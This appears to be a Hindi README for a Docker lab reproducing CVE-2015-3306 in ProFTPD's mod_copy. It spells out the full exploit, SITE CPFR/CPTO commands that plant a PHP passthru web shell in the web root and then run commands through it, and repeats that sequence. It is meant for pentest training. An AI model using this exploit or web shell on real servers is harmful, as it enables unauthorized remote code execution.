
CVE-2015-3306 - ProFTPD - RCE होम लैब सेटअप (Docker) Red Teaming या Penetration Testing के लिए उपयोग में आसान
यह लैब CVE-2015-3306 — ProFTPD mod_copy Remote File Copy to RCE भेद्यता का अनुकरण करने के लिए डिज़ाइन की गई है।
ProFTPD के mod_copy मॉड्यूल के माध्यम से Web Shell Injection RCE सीखने के लिए उपयोग की जाती है।
mod_copy पूर्ण रूप से सक्षम (SITE CPFR / SITE CPTO)/var/www/html का अनुकरण करने के लिए Apache2 + PHP5flag_RANDOM.txt उत्पन्न करता है/etc/proftpd/proftpd.conf
/usr/local/proftpd/
/var/www/html/
/tmp/flag_xxx.txt
/entrypoint.sh
docker build -t sentinel7-proftpd-lab .
docker run -it --rm -p 21:21 -p 80:80 sentinel7-proftpd-lab
nc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php
वेब के माध्यम से खोलें:
http://<IP>/webshell.php?cmd=<command>
इसमें संग्रहीत है:
/tmp/flag_RANDOM.txt
यह लैब mod_copy के साथ ProFTPD 1.3.5 का उपयोग करके CVE-2015-3306 का अनुकरण करती है, जिससे हमलावर ProFTPD mod_copy Remote File Copy to RCE कर सकते हैं।
mod_copy सक्षम (SITE CPFR + SITE CPTO)flag_RANDOM.txtnc <IP> 21
SITE CPFR /proc/self/cmdline
SITE CPTO /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPFR /tmp/<?php echo passthru($_GET['cmd']); ?>
SITE CPTO /var/www/html/webshell.php
फिर निष्पादित करें:
http://<IP>/webshell.php?cmd=<command>
/tmp/flag_RANDOM.txt
केवल शैक्षिक और अधिकृत पेनिट्रेशन परीक्षण के लिए।